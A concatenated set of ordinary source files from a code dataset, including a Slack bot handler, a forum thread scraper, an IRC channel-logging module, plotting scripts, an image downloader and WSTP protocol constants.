(2020)\n\nimport slack\nimport settings\nimport json\nimport config\nimport requests\n\nfrom slackers.hooks import events, actions\n\nconv_db = config.conv_handler\n\n\n# This will run if there are no remarks submitted\n# Remarks will be handled by the judging side\n@actions.on(\"block_actions:editing_end\")\ndef finalize_judging(payload):\n channel = payload[\"channel\"][\"id\"]\n user_id = payload[\"user\"][\"id\"]\n state = conv_db.get_state(channel, user_id)\n\n if state != config.EDIT_REMARKS:\n config.web_client.chat_postMessage(\n channel=channel,\n text=f\"You can only execute this command after submitting scores as a judge, <@{user_id}>!\",\n )\n\n else:\n latest_message_ts = conv_db.get_ts(channel, user_id)\n message = f\"Your judging process has been finalized, <@{user_id}>!\"\n config.web_client.chat_update(\n channel=channel, text=message, ts=latest_message_ts, blocks=None\n )\n\n conv_db.change_state(channel, user_id, config.CONVERSATION_END)\n\n return\n","sub_path":"app/handlers/editing/end_edit.py","file_name":"end_edit.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"317616922","text":"# -*- coding: gbk-*-\n\n\"\"\"\nanalyse changes of Q values, and the max Q's action\n\"\"\"\nimport os\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntemp_dir = {}\ndir_path = \"/home/cike/chauncy/coding/spyder/multiagent/soccerdata/actionvisit_20180507\"\n\n\ndir_files = os.listdir(dir_path)\nfor i in dir_files:\n if \"AGENT_1\" in i and \"action\" in i:\n file_path = os.path.join(dir_path, i)\n temp_dir = pkl.load(open(file_path, \"rb\"), encoding='iso-8859-1')\n\n\n\nall_kyes = []\nlen_keys = []\nzero_len_keys = []\nfor keys in temp_dir:\n values = np.array(temp_dir[keys], dtype=np.float32).T[:-1]\n values_len = len(values[values==np.float(0)]) \n \n all_kyes.append(keys)\n zero_len_keys.append(values_len)\n len_keys.append(len(temp_dir[keys]))\n\n \nall_kyes = np.array(all_kyes)\nlen_keys = np.array(len_keys)\nzero_len_keys = np.array(zero_len_keys)\n\n\nmax_keys_list = all_kyes[len_keys>2000]\nzero_len_keys_list = zero_len_keys[len_keys>2000]\n\n\nmax_keys = tuple(list(max_keys_list[np.argmin(zero_len_keys_list)]))\nmax_len_keys_values = 
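The category parsing in the music_spider record above can be checked offline against a tiny static fragment shaped like the kuwo page; the markup below is invented for illustration.

from bs4 import BeautifulSoup

html = ('<div class="bang"><h2 data-catid="7">Top</h2>'
        '<ul><li><a data-catid="71">Hits</a><a data-catid="72">New</a></li></ul>'
        '</div>')
soup = BeautifulSoup(html, 'html5lib')
for bang in soup.find_all('div', {'class': 'bang'}):
    print(bang.h2['data-catid'], bang.h2.get_text())
    for a in bang.find('li').find_all('a'):
        print(' ', a['data-catid'], a.get_text())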
np.array(temp_dir[max_keys]).T[:-1]\nlabel_index = np.array(temp_dir[max_keys]).T[-1]\n\n\n# max_len = 30000\nusableActions = [\"SHOOT\", \"DRIBBLE\", \"PASSfar\", \"PASSnear\", \"MOVE\"]\ndiffQ = []\nmaxQ = []\nfor index, i in enumerate(max_len_keys_values[:-1].T):\n    diffQ.append(abs(max(i) - min(i)))\n    maxQ.append(max(i))\n    \n    \nplt.figure()\nplt.plot(range(len(diffQ)), diffQ, label=\"diffQ\")\nplt.legend(loc='best')\nplt.show()\n\n\nplt.figure()\nplt.plot(range(len(maxQ)), maxQ, label=\"maxQ\")\nplt.legend(loc='best')\nplt.show()\n\n\ndiffQ = np.array(diffQ)\nmaxQ = np.array(maxQ)\n\nplt.figure()\nplt.plot(range(len(maxQ)), maxQ/(maxQ + 2), label=\"maxQ/(maxQ+2)\")\nplt.legend(loc='best')\nplt.show()\n \n\nplt.figure()\nfor index, i in enumerate(max_len_keys_values[:-1]):\n    plt.plot(range(len(i)), i, label=usableActions[index])\n\nplt.legend(loc='best')\nplt.show()\n \n\n\nplt.figure()\nplt.plot(range(len(max_len_keys_values[-1])), max_len_keys_values[-1], label=usableActions[-1])\nplt.legend(loc='best')\nplt.show()\n\n\n\n# maxQ - minQ\ndiffQ_list = []\ndiffQ_max_list = []\nfor key,value in temp_dir.items():\n    value_array = np.array(value).T[:-1]\n    diffQ = value_array.max(axis=0) - value_array.min(axis=0)\n    diffQ_list.append(diffQ)\n    diffQ_max_list.append(diffQ.max())\n    \ndiffQ_max_list = np.array(diffQ_max_list)\nlen(diffQ_max_list[diffQ_max_list > 0.9])\n\n\ndef ask(visit):\n    return np.power(1+0.5, -1*np.sqrt(visit))\n\ndef giveOne(visit):\n    return 1 - np.power(1+1.5, -1*np.log2(visit))\n\ndef giveTwo(visit, diffQ):\n    return 1 - np.power(1+1.5, -1*np.sqrt(visit)*diffQ)\n\ndef giveTwoOne(x):\n    return 1 - np.power(1+0.05, -1*x)\n    \ndef giveTHree(x):\n    return x/(x+1)\n    \n# different visit\nvisit = 1000\nplt.figure()\nplt.plot(range(visit), ask(range(visit)), label=\"ask\")\nplt.plot(range(visit), giveOne(range(visit)), label=\"giveOne\")\nplt.plot(range(visit), giveTwo(range(visit), 0.5), label=\"giveTwo-diffQ 0.5\")\nplt.plot(range(visit), giveTwo(range(visit), 0.1), label=\"giveTwo-diffQ 0.1\")\nplt.legend(loc='best')\nplt.show() \n\n\n# different diffQ\ndiffQ = 1\nplt.figure()\nplt.plot(np.arange(0, diffQ, 0.001), giveTwo(10, np.arange(0, diffQ, 0.001)), label=\"giveTwo-visit 10\")\nplt.plot(np.arange(0, diffQ, 0.001), giveTwo(50, np.arange(0, diffQ, 0.001)), label=\"giveTwo-visit 50\")\nplt.plot(np.arange(0, diffQ, 0.001), giveTwo(100, np.arange(0, diffQ, 0.001)), label=\"giveTwo-visit 100\")\nplt.plot(np.arange(0, diffQ, 0.001), giveTwo(1000, np.arange(0, diffQ, 0.001)), label=\"giveTwo-visit 1000\")\nplt.legend(loc='best')\nplt.show() \n \n\n# different Q and visit\nend = 100\nplt.figure()\nplt.plot(np.arange(0, end, 1), giveTwoOne(np.arange(0, end, 1)), label=\"giveTwoOne\")\nplt.show() \n\n \n# different x/(x+1)\nend = 1\nplt.figure()\nplt.plot(np.arange(0, end, 0.01), giveTHree(np.arange(0, end, 0.01)), label=\"giveTHree\")\nplt.show() \n \n \n \n \n \n ","sub_path":"AAMAS2019/soccerdata/analyse_soccer.py","file_name":"analyse_soccer.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"194422778","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nUsage: \npython flashbackscraper.py \nExample url: https://www.flashback.org/t2975477\nWritten by: Christopher Kullenberg \n\"\"\"\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport sqlite3\nimport sys\nimport datetime\nimport csv\n\ncounter = 1\n\ndef parsethread(nexturl):\n    print(\"Scraping\", 
nexturl)\n threadnumber = nexturl[26:]\n postidlist = []\n userlist = []\n datelist = []\n timelist = []\n bodylist = []\n inreplylist = []\n r = requests.get(nexturl)\n print(r)\n html = r.content\n soup = BeautifulSoup(html, \"lxml\")\n #print(soup)\n postbody = soup.findAll(\"div\", class_=\"post_message\")\n username = soup.findAll(\"li\", class_=\"dropdown-header\")\n heading = soup.findAll(\"div\", class_=\"post-heading\")\n print(\"Length: \" + str(len(postbody)))\n for p in postbody:\n postid = re.findall(\"(?<=id\\=\\\"post\\_message\\_).*?(?=\\\"\\>)\", str(p), \n re.IGNORECASE)\n if postid:\n postidlist.append(postid[0])\n for u in username:\n if u.text == \"Ämnesverktyg\":\n continue\n else:\n userlist.append(u.text)\n for h in heading:\n yesterday = datetime.date.today() - datetime.timedelta(1)\n todaymatch = re.findall(\"Idag,\\s\\d\\d\\:\\d\\d\", h.text, re.IGNORECASE)\n yesterdaymatch = re.findall(\"Igår,\\s\\d\\d\\:\\d\\d\", h.text, re.IGNORECASE)\n match = re.findall(\"\\d\\d\\d\\d\\-\\d\\d\\-\\d\\d,\\s\\d\\d\\:\\d\\d\", h.text, \n re.IGNORECASE)\n if todaymatch:\n datelist.append(datetime.date.today())\n #print(datetime.date.today())\n timelist.append(todaymatch[0][6:])\n elif yesterdaymatch:\n datelist.append(yesterday)\n #print(yesterday)\n timelist.append(yesterdaymatch[0][6:])\n elif match:\n datelist.append(match[0][:10])\n print(match[0][:10])\n timelist.append(match[0][12:])\n for p in postbody:\n bodylist.append(p.text)\n for p in postbody:\n match = re.findall(\"(?<=Ursprungligen postat av ).*\", p.text, \n re.IGNORECASE)\n if match:\n inreplylist.append(match[0])\n else:\n inreplylist.append(\"none\")\n\n print(len(postidlist), len(userlist), len(datelist), len(timelist), \n len(bodylist), len(inreplylist))\n #print(soup)\n for n in range(0,12):\n print(\"Adding post\", str(((counter * 12) + n) - 12), \"to database\")\n try:\n cursor.execute('''\n INSERT INTO fb(idnumber, user, date, time, body, inreply)\n VALUES(?,?,?,?,?,?)''', \n (postidlist[n], userlist[n], datelist[n], timelist[n], \n bodylist[n], inreplylist[n])\n )\n db.commit()\n except (IndexError, sqlite3.IntegrityError) as e:\n print(\"\\nEnd of thread\\nWriting sqlite3 and csv files\\nExiting...\")\n outfile = open(nexturl[26:] + \".csv\", \"w\")\n csvWriter = csv.writer(outfile)\n rows = cursor.execute('SELECT * FROM fb')\n csvWriter.writerows(rows)\n outfile.close()\n sys.exit()\n\ndef iterator(starturl):\n nexturl = starturl + \"p\" + str(counter)\n parsethread(nexturl)\n\nif __name__ == '__main__':\n starturl = sys.argv[1]\n try:\n db = sqlite3.connect(starturl[26:] + '.sqlite3')\n cursor = db.cursor()\n cursor.execute('''\n CREATE TABLE fb(id INTEGER PRIMARY KEY, idnumber TEXT UNIQUE, user TEXT,\n date TEXT, time TEXT, body TEXT, inreply TEXT)\n ''')\n db.commit()\n while True:\n iterator(starturl)\n print(\"All done for page:\", str(counter), \"\\n\")\n counter += 1\n except sqlite3.OperationalError:\n print(\"The file\", starturl[26:] + \n \".sqlite3 already exists. 
Try renaming it first.\")\n sys.exit()\n\n\n","sub_path":"flashbackscraper.py","file_name":"flashbackscraper.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165634952","text":"\n#!/usr/bin/env python3\n\nimport asyncio\nimport websockets\nimport json\n\nasync def server(websocket, path):\n while True:\n # Get received data from websocket\n data = await websocket.recv()\n print (\"Received: \" + data)\n json_data = json.loads(data)\n if json_data.get('function') == 'echo':\n #echo back the first argument\n json_data['return'] = json_data['args'][0]\n elif json_data.get('function') == 'ask':\n #echo back the first argument\n json_data['return'] = input(json_data['args'][0])\n elif json_data.get('function') == 'throw':\n #throw the first argument\n json_data['throw'] = json_data['args'][0]\n elif not json_data.get('function') is None:\n json_data['throw'] = 'Unknown function : ' + json_data['function']\n\n # Send response back to client to acknowledge receiving message\n response = json.dumps(json_data)\n print (\"Responding: \" + response)\n await websocket.send(response)\n\n# Create websocket server\nstart_server = websockets.serve(server, \"localhost\", 5150)\n\n# Start and run websocket server forever\nasyncio.get_event_loop().run_until_complete(start_server)\nprint(\"Starting loop\")\nasyncio.get_event_loop().run_forever()","sub_path":"www/test/0.0.9/test/sockets/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"326511782","text":"from twisted.internet.task import LoopingCall\nfrom twisted.plugin import IPlugin\nfrom twisted.python.logfile import DailyLogFile\nfrom txircd.config import ConfigValidationError\nfrom txircd.module_interface import IModuleData, ModuleData\nfrom txircd.utils import CaseInsensitiveDictionary, now\nfrom zope.interface import implementer\nfrom fnmatch import fnmatchcase\nfrom typing import Any, Callable, Dict, List, Tuple\n\n@implementer(IPlugin, IModuleData)\nclass ChannelLog(ModuleData):\n\tname = \"ChannelLog\"\n\t\n\tdef actions(self) -> List[Tuple[str, int, Callable]]:\n\t\treturn [ (\"commandextra-PRIVMSG\", 1, self.logMsg),\n\t\t\t(\"commandextra-NOTICE\", 1, self.logNotice),\n\t\t\t(\"servercommandextra-PRIVMSG\", 1, self.logMsgServer),\n\t\t\t(\"servercommandextra-NOTICE\", 1, self.logNoticeServer),\n\t\t\t(\"join\", 1, self.logJoin),\n\t\t\t(\"remotejoin\", 1, self.logJoin),\n\t\t\t(\"leave\", 1, self.logLeave),\n\t\t\t(\"remoteleave\", 1, self.logLeave),\n\t\t\t(\"topic\", 1, self.logTopic),\n\t\t\t(\"modechanges-channel\", 1, self.logModeChanges) ]\n\t\n\tdef load(self) -> None:\n\t\tself.logFiles = CaseInsensitiveDictionary()\n\t\tself.cleanupProcess = LoopingCall(self.cleanLogFiles)\n\t\tself.cleanupProcess.start(600, now=False)\n\t\n\tdef unload(self) -> None:\n\t\tfor logFile in self.logFiles.values():\n\t\t\tlogFile.close()\n\t\tself.logFiles.clear()\n\t\tif self.cleanupProcess.running:\n\t\t\tself.cleanupProcess.stop()\n\t\n\tdef verifyConfig(self, config: Dict[str, Any]) -> None:\n\t\tif \"channel_log_directory\" in config:\n\t\t\tif not isinstance(config[\"channel_log_directory\"], str):\n\t\t\t\traise ConfigValidationError(\"channel_log_directory\", \"must be a string representing the directory\")\n\t\tif \"channel_log_channels\" in config:\n\t\t\tif not isinstance(config[\"channel_log_channels\"], 
list):\n\t\t\t\traise ConfigValidationError(\"channel_log_channels\", \"must be a list of channel masks\")\n\t\t\tfor channelNameMask in config[\"channel_log_channels\"]:\n\t\t\t\tif not isinstance(channelNameMask, str):\n\t\t\t\t\traise ConfigValidationError(\"channel_log_channels\", \"must be a list of channel masks\")\n\t\n\tdef cleanLogFiles(self) -> None:\n\t\tdeadChannelNames = {}\n\t\tfor channelName, logFile in self.logFiles.items():\n\t\t\tif channelName not in self.ircd.channels:\n\t\t\t\tdeadChannelNames[channelName] = logFile\n\t\tfor channelName, logFile in deadChannelNames.items():\n\t\t\tlogFile.close()\n\t\t\tdel self.logFiles[channelName]\n\t\n\tdef timestampPrefix(self) -> str:\n\t\tnowTime = now()\n\t\treturn \"[{}:{:02d}:{:02d}]\".format(nowTime.hour, nowTime.minute, nowTime.second)\n\t\n\tdef logLine(self, channel: \"IRCChannel\", line: str) -> None:\n\t\tline = \"{} {}\\n\".format(self.timestampPrefix(), line)\n\t\tif channel.name in self.logFiles:\n\t\t\tlogFile = self.logFiles[channel.name]\n\t\telse:\n\t\t\tif not self.shouldLogChannel(channel):\n\t\t\t\treturn\n\t\t\tlogFile = DailyLogFile(channel.name, self.ircd.config.get(\"channel_log_directory\", \"\"))\n\t\t\tself.logFiles[channel.name] = logFile\n\t\tif logFile.shouldRotate():\n\t\t\tlogFile.rotate()\n\t\tlogFile.write(line)\n\t\n\tdef shouldLogChannel(self, channel: \"IRCChannel\") -> bool:\n\t\tchannelNameMaskList = self.ircd.config.get(\"channel_log_channels\", [])\n\t\tif not channelNameMaskList:\n\t\t\treturn True\n\t\tchannelName = channel.name\n\t\tfor channelNameMask in channelNameMaskList:\n\t\t\tif fnmatchcase(channelName, channelNameMask):\n\t\t\t\treturn True\n\t\treturn False\n\t\n\tdef logMsg(self, user: \"IRCUser\", data: Dict[Any, Any]) -> None:\n\t\tif \"targetchans\" not in data:\n\t\t\treturn\n\t\tfor channel, message in data[\"targetchans\"].items():\n\t\t\tif message[:7] == \"\\x01ACTION\":\n\t\t\t\tmessage = message[8:]\n\t\t\t\tif message[-1] == \"\\x01\":\n\t\t\t\t\tmessage = message[:-1]\n\t\t\t\tself.logLine(channel, \"*{} {}\".format(user.nick, message))\n\t\t\t\tcontinue\n\t\t\tself.logLine(channel, \"<{}> {}\".format(user.nick, message))\n\t\n\tdef logNotice(self, user: \"IRCUser\", data: Dict[Any, Any]) -> None:\n\t\tif \"targetchans\" not in data:\n\t\t\treturn\n\t\tfor channel, message in data[\"targetchans\"].items():\n\t\t\tself.logLine(channel, \"--{}-- {}\".format(user.nick, message))\n\t\n\tdef logMsgServer(self, server: \"IRCServer\", data: Dict[Any, Any]) -> None:\n\t\tif \"tochan\" not in data:\n\t\t\treturn\n\t\tfromUser = data[\"from\"]\n\t\tchannel = data[\"tochan\"]\n\t\tmessage = data[\"message\"]\n\t\tif message[:7] == \"\\x01ACTION\":\n\t\t\tmessage = message[8:]\n\t\t\tif message[-1] == \"\\x01\":\n\t\t\t\tmessage = message[:-1]\n\t\t\tself.logLine(channel, \"*{} {}\".format(fromUser.nick, message))\n\t\telse:\n\t\t\tself.logLine(channel, \"<{}> {}\".format(fromUser.nick, message))\n\t\n\tdef logNoticeServer(self, server: \"IRCServer\", data: Dict[Any, Any]) -> None:\n\t\tif \"tochan\" not in data:\n\t\t\treturn\n\t\tself.logLine(data[\"tochan\"], \"--{}-- {}\".format(data[\"from\"].nick, data[\"message\"]))\n\t\n\tdef logJoin(self, channel: \"IRCChannel\", user: \"IRCUser\", fromServer: \"IRCServer\" = None) -> None:\n\t\tself.logLine(channel, \"> {} has joined {}\".format(user.nick, channel.name))\n\t\n\tdef logLeave(self, channel: \"IRCChannel\", user: \"IRCUser\", partType: str, typeData: Dict[str, Any]) -> None:\n\t\tif partType == 
\"QUIT\":\n\t\t\tself.logLine(channel, \"> {} has quit: {}\".format(user.nick, typeData[\"reason\"]))\n\t\telif partType == \"KICK\":\n\t\t\tself.logLine(channel, \"> {} has been kicked from {} by {}: {}\".format(user.nick, channel.name, typeData[\"user\"].nick if typeData[\"byuser\"] else typeData[\"server\"].name, typeData[\"reason\"]))\n\t\telse:\n\t\t\tif \"reason\" in typeData and typeData[\"reason\"]:\n\t\t\t\tself.logLine(channel, \"> {} has left {}: {}\".format(user.nick, channel.name, typeData[\"reason\"]))\n\t\t\telse:\n\t\t\t\tself.logLine(channel, \"> {} has left {}\".format(user.nick, channel.name))\n\t\n\tdef logTopic(self, channel: \"IRCChannel\", setter: str, source: str, oldTopic: str) -> None:\n\t\tself.logLine(channel, \"> {} changed the channel topic: {}\".format(source, channel.topic))\n\t\n\tdef logModeChanges(self, channel: \"IRCChannel\", source: str, sourceName: str, modeChanges: List[Tuple[bool, str, str, str, \"datetime\"]]) -> None:\n\t\tmodes = []\n\t\tparams = []\n\t\tlastAdding = None\n\t\tfor modeChangeData in modeChanges:\n\t\t\tif lastAdding != modeChangeData[0]:\n\t\t\t\tif modeChangeData[0]:\n\t\t\t\t\tmodes.append(\"+\")\n\t\t\t\t\tlastAdding = True\n\t\t\t\telse:\n\t\t\t\t\tmodes.append(\"-\")\n\t\t\t\t\tlastAdding = False\n\t\t\tmodes.append(modeChangeData[1])\n\t\t\tif modeChangeData[2]:\n\t\t\t\tparams.append(modeChangeData[2])\n\t\tmodeChangeStr = \"{} {}\".format(\"\".join(modes), \" \".join(params)) if params else \"\".join(modes)\n\t\tself.logLine(channel, \"> {} has set modes {}\".format(sourceName, modeChangeStr))\n\nchannelLog = ChannelLog()","sub_path":"txircd/modules/extra/channellog.py","file_name":"channellog.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"459880152","text":"\n__author__ = 'eduardo'\n\nimport csv\n\nimport matplotlib.pyplot as plt\n\n\ndef process_data(file):\n\n dictionary = dict()\n\n with open(file, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n\n for row in reader:\n validation = row['Validation']\n\n if validation == 'true':\n authority = row['Certificate Authority']\n\n if authority in dictionary:\n dictionary[authority] += 1\n else:\n dictionary[authority] = 1\n\n return dictionary\n\n\ndef plot_data(data):\n\n sorted_keys = sorted(data.iterkeys())\n values = []\n\n for key in sorted_keys:\n values.append(data[key])\n\n plt.axis(\"equal\")\n plt.title('Certificate Authority')\n plt.pie(values, labels=sorted_keys)\n\n # plt.savefig('authority.png')\n plt.show()\n\nif __name__ == '__main__':\n plot_data(process_data('test/output1.csv'))","sub_path":"plot/https/certificateAuthority.py","file_name":"certificateAuthority.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565166019","text":"import os\nimport sys\nimport time\nimport urllib.request\nimport requests\nimport pymongo\nfrom configs import database_name, host_url, pic_root_folder\n\nTIMEOUTSEC = 300\n\n\ndef save_pic_from_url_wrapper(pic_url, root_folder=pic_root_folder):\n if False:\n pass\n else:\n pic_path = root_folder + pic_url\n pic_folder = os.path.dirname(pic_path)\n os.makedirs(pic_folder, exist_ok=True)\n if os.path.exists(pic_path):\n return\n print('Downloading: ' + pic_url)\n save_pic_from_url(host_url + pic_url, pic_path)\n\n\ndef save_pic_from_url(pic_url, pic_path, ref=host_url):\n try:\n f = open(pic_path, 'wb')\n content = 
requests.get(pic_url,\n                               headers={'referer': ref},\n                               timeout=TIMEOUTSEC).content\n        f.write(content)\n        f.close()\n    except requests.exceptions.RequestException as err:\n        # requests raises RequestException subclasses; urllib.error.HTTPError never fires here\n        status = getattr(getattr(err, 'response', None), 'status_code', None)\n        if status in [403, 404, 503, 504]:\n            print(sys.exc_info())\n        else:\n            time.sleep(5)\n            print(sys.exc_info())\n            return False\n    except Exception:\n        time.sleep(5)\n        print(sys.exc_info())\n\n\ndef update_db_according_to_file():\n    client = pymongo.MongoClient('localhost', 27017)\n    db = client[database_name]\n    cursor = db['pics'].find({'filePath': None}, no_cursor_timeout=True)\n    for i in cursor:\n        url = i['url']\n        print(url)\n        file_name = pic_root_folder + url\n        if os.path.isfile(file_name):\n            print(url)\n            i['filePath'] = 1\n            db['pics'].save(i)\n    cursor.close()\n\n\ndef update_db_according_to_file_complete():\n    client = pymongo.MongoClient('localhost', 27017)\n    db = client[database_name]\n    cursor = db['pics'].find(no_cursor_timeout=True)\n    for i in cursor:\n        url = i['url']\n        print(url)\n        file_name = pic_root_folder + url\n        if os.path.isfile(file_name):\n            i['filePath'] = 1\n        else:\n            i['filePath'] = None\n            print('Not Found')\n        db['pics'].save(i)\n    cursor.close()\n\n\ndef download_all_pics_incremental():\n    # update_db_according_to_file()\n\n    client = pymongo.MongoClient('localhost', 27017)\n    db = client[database_name]\n\n    cursor = db['picSets'].find()\n    cover_img_url_list = [i['coverImgUrl'] for i in cursor]\n    total = len(cover_img_url_list)\n    print('Total urls: ' + str(total))\n    for cur, url in enumerate(cover_img_url_list):\n        save_pic_from_url_wrapper(url)\n        print('{}/{}, {}% complete. 
Finished downloading: {}'.format(\n cur + 1, total, format((cur+1)/total*100, '0.2f'), url))\n\n update_db_according_to_file()\n\nif __name__ == '__main__':\n # update_db_according_to_file_complete()\n pass\n","sub_path":"utils/down_pic.py","file_name":"down_pic.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"369022501","text":"'''\nmacros and typedefs goes here\n'''\nimport ctypes\n\n# === WSTP error codes from wstp.h\n\nWSEUNKNOWN =-1\nWSEOK = 0\nWSEDEAD = 1\nWSEGBAD = 2\nWSEGSEQ = 3\nWSEPBTK = 4\nWSEPSEQ = 5\nWSEPBIG = 6\nWSEOVFL = 7\nWSEMEM = 8\nWSEACCEPT = 9\nWSECONNECT =10\nWSECLOSED =11\nWSEDEPTH =12 # internal error\nWSENODUPFCN =13 # stream cannot be duplicated\n\nWSENOACK =15\nWSENODATA =16\nWSENOTDELIVERED =17\nWSENOMSG =18\nWSEFAILED =19\n\nWSEGETENDEXPR =20\nWSEPUTENDPACKET =21 # unexpected call of WSEndPacket\n # currently atoms aren't\n # counted on the way out so this error is raised only when\n # WSEndPacket is called in the midst of an atom\nWSENEXTPACKET =22\nWSEUNKNOWNPACKET =23\nWSEGETENDPACKET =24\nWSEABORT =25\nWSEMORE =26 # internal error\nWSENEWLIB =27\nWSEOLDLIB =28\nWSEBADPARAM =29\nWSENOTIMPLEMENTED =30\n\nWSEINIT =32\nWSEARGV =33\nWSEPROTOCOL =34\nWSEMODE =35\nWSELAUNCH =36\nWSELAUNCHAGAIN =37\nWSELAUNCHSPACE =38\nWSENOPARENT =39\nWSENAMETAKEN =40\nWSENOLISTEN =41\nWSEBADNAME =42\nWSEBADHOST =43\nWSERESOURCE =44 # a required resource was missing\nWSELAUNCHFAILED =45\nWSELAUNCHNAME =46\nWSEPDATABAD =47\nWSEPSCONVERT =48\nWSEGSCONVERT =49\nWSENOTEXE =50\nWSESYNCOBJECTMAKE =51\nWSEBACKOUT =52\nWSEBADOPTSYM =53\nWSEBADOPTSTR =54\nWSENEEDBIGGERBUFFER=55\nWSEBADNUMERICSID =56\nWSESERVICENOTAVAILABLE=57\nWSEBADARGUMENT =58\nWSEBADDISCOVERYHOSTNAME =59\nWSEBADDISCOVERYDOMAINNAME =60\nWSEBADSERVICENAME =61\nWSEBADDISCOVERYSTATE =62\nWSEBADDISCOVERYFLAGS =63\nWSEDISCOVERYNAMECOLLISION =64\nWSEBADSERVICEDISCOVERY =65\nWSELAST=WSESERVICENOTAVAILABLE\n\nWSETRACEON = 996\nWSETRACEOFF = 997\nWSEDEBUG = 998\nWSEASSERT = 999 # an internal assertion failed\nWSEUSER =1000 # start of user defined errors\n\n# === WSTP tokens, adapted from wstp.h\n\nREALBIT = 4\nREAL_MASK = (1 << REALBIT)\nXDRBIT = 5\nXDR_MASK = (1 << XDRBIT)\nBINARYBIT = 7\nBINARY_MASK = (1 << BINARYBIT)\nSIZEVARIANTBIT = 6\nSIZEVARIANT_MASK = (1 << SIZEVARIANTBIT)\n\nWSTKOLDINT = ord('I') # 73 Ox49 01001001 integer leaf node\nWSTKOLDREAL= ord('R') # 82 Ox52 01010010 real leaf node\n\nWSTKFUNC =ord('F') # 70 Ox46 01000110 non-leaf node\n\nWSTKERROR = 0 # bad token\nWSTKERR = 0 # bad token\n\n# text token bit patterns: 0010x01x --exactly 2 bits worth chosen to make things somewhat readable\nWSTKSTR =ord('\"') # 34 0x22 00100010\nWSTKSYM =ord('#') # 35 0x23 # 00100011 octal here as hash requires a trigraph\n\nWSTKOPTSYM =ord('O') # 79 00101010\nWSTKOPTSTR =ord('Q') # 81 01010001\n\nWSTKREAL =ord('*') # 42 0x2A 00101010\nWSTKINT =ord('+') # 43 0x2B 00101011\n# The following defines are for internal use only\nWSTKPCTEND =ord(']') # at end of top level expression\nWSTKAPCTEND=ord('\\n') # at end of top level expression\nWSTKEND =ord('\\n')\nWSTKAEND =ord('\\r')\nWSTKSEND =ord(',')\n\nWSTKCONT =ord('\\\\')\nWSTKELEN =ord(' ')\n\nWSTKNULL =ord('.')\nWSTKOLDSYM =ord('Y') # 89 0x59 01011001\nWSTKOLDSTR =ord('S') # 83 0x53 01010011\n\nWSTKPACKED =ord('P') # 80 0x50 01010000\nWSTKARRAY =ord('A') # 65 0x41 01000001\nWSTKDIM =ord('D') # 68 0x44 01000100\n\nWSTK_INVALID = 155\n\nWSTK_8BIT_SIGNED_2sCOMPLEMENT_INTEGER = 
160\nWSTK_8BIT_UNSIGNED_2sCOMPLEMENT_INTEGER = 161\nWSTK_8BIT_UNSIGNED_INTEGER = WSTK_8BIT_UNSIGNED_2sCOMPLEMENT_INTEGER\n\nWSTK_16BIT_SIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 162\nWSTK_16BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 163\nWSTK_16BIT_UNSIGNED_BIGENDIAN_INTEGER = WSTK_16BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER\n\nWSTK_32BIT_SIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 164\nWSTK_32BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 165\nWSTK_32BIT_UNSIGNED_BIGENDIAN_INTEGER = WSTK_32BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER\n\nWSTK_64BIT_SIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 166\nWSTK_64BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 167\nWSTK_64BIT_UNSIGNED_BIGENDIAN_INTEGER = WSTK_64BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER\n\nWSTK_16BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER =226\nWSTK_16BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER=227\nWSTK_16BIT_UNSIGNED_LITTLEENDIAN_INTEGER=WSTK_16BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_32BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER =228\nWSTK_32BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER=229\nWSTK_32BIT_UNSIGNED_LITTLEENDIAN_INTEGER=WSTK_32BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER =230\nWSTK_64BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER=231\nWSTK_64BIT_UNSIGNED_LITTLEENDIAN_INTEGER=WSTK_64BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\n\nWSTK_BIGENDIAN_IEEE754_SINGLE =180\nWSTK_BIGENDIAN_IEEE754_DOUBLE =182\nWSTK_BIGENDIAN_128BIT_DOUBLE =184\nWSTK_LITTLEENDIAN_IEEE754_SINGLE =244\nWSTK_LITTLEENDIAN_IEEE754_DOUBLE =246\nWSTK_LITTLEENDIAN_128BIT_DOUBLE =248\n\n'''\nWSTK_CSHORT_P 193\nWSTK_CINT_P 194\nWSTK_CLONG_P 